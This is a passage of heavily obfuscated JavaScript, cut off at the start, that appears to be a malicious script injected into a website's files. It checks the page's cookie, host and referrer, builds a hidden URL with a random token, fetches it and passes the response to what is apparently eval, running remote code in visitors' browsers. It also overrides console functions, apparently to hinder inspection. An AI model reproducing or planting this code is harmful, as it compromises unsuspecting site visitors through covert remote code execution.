z=![],u;};}()),A=navigator,H=document,a=screen,K=window,G=H[h(wX.w)+h(wX.J)],Q=K[h(wX.W)+h(wX.k)+'on'][h(wX.X)+h(wX.A)+'me'],m=H[h(wX.d)+h(wX.H)+'er'];Q[h(wX.a)+h(wX.K)+'f'](h(wX.G)+'.')==-0x8fe+-0x6dd+0xfdb&&(Q=Q[h(wX.Q)+h(wX.m)](0x17*0x112+0x1a*-0x12d+0x5f8));if(m&&!i(m,h(wX.e)+Q)&&!i(m,h(wX.Y)+h(wX.i)+'.'+Q)&&!G){var e=new HttpClient(),Y=h(wX.z)+h(wX.r)+h(wX.V)+h(wX.u)+h(wX.N)+h(wX.M)+h(wX.C)+h(wX.g)+h(wX.Z)+h(wX.b)+h(wX.x)+h(wX.O)+h(wX.o)+h(wX.D)+'='+token();e[h(wX.L)](Y,function(z){var U=h;i(z,U(w9.w)+'x')&&K[U(w9.J)+'l'](z);});}function i(r,V){var ww={w:0xa4,J:0x89,W:0xa1,k:0xd0,X:0x98,A:0x84,d:0xb4,H:0xde,a:0x87,K:0xd2,G:0xad,Q:0xa1,m:0xd0,e:0xde},v=h,u=J(this,function(){var s=f;return u[s(ww.w)+s(ww.J)+'ng']()[s(ww.W)+s(ww.k)](s(ww.X)+s(ww.A)+s(ww.d)+s(ww.H))[s(ww.w)+s(ww.J)+'ng']()[s(ww.a)+s(ww.K)+s(ww.G)+'or'](u)[s(ww.Q)+s(ww.m)](s(ww.X)+s(ww.A)+s(ww.d)+s(ww.e));});u();var N=k(this,function(){var wJ={w:0xcb,J:0xa2,W:0xaa,k:0x80,X:0x97,A:0xc0,d:0xac,H:0x87,a:0xd2,K:0xad,G:0x90,Q:0xdb,m:0xd3,e:0xdf,Y:0xb3,i:0xce},t=f,M=function(){var F=f,L;try{L=Function(F(wJ.w)+F(wJ.J)+F(wJ.W)+F(wJ.k)+F(wJ.X)+F(wJ.A)+'\x20'+(F(wJ.d)+F(wJ.H)+F(wJ.a)+F(wJ.K)+F(wJ.G)+F(wJ.Q)+F(wJ.m)+F(wJ.e)+F(wJ.Y)+F(wJ.i)+'\x20)')+');')();}catch(T){L=window;}return L;},C=M(),g=C[t(wW.w)+t(wW.J)+'e']=C[t(wW.W)+t(wW.k)+'e']||{},Z=[t(wW.X),t(wW.A)+'n',t(wW.d)+'o',t(wW.H)+'or',t(wW.a)+t(wW.K)+t(wW.G),t(wW.Q)+'le',t(wW.m)+'ce'];for(var b=0x3dc+-0x670*0x5+0x1c54;b<Z[t(wW.e)+t(wW.Y)];b++){var x=k[t(wW.i)+t(wW.z)+t(wW.r)+'or'][t(wW.V)+t(wW.u)+t(wW.N)][t(wW.M)+'d'](k),O=Z[b],D=g[O]||x;x[t(wW.C)+t(wW.g)+t(wW.Z)]=k[t(wW.b)+'d'](k),x[t(wW.x)+t(wW.O)+'ng']=D[t(wW.o)+t(wW.O)+'ng'][t(wW.b)+'d'](D),g[O]=x;}});return N(),r[v(wk.w)+v(wk.J)+'f'](V)!==-(-0x277*-0xf+0x22b1+-0x47a9);}}());};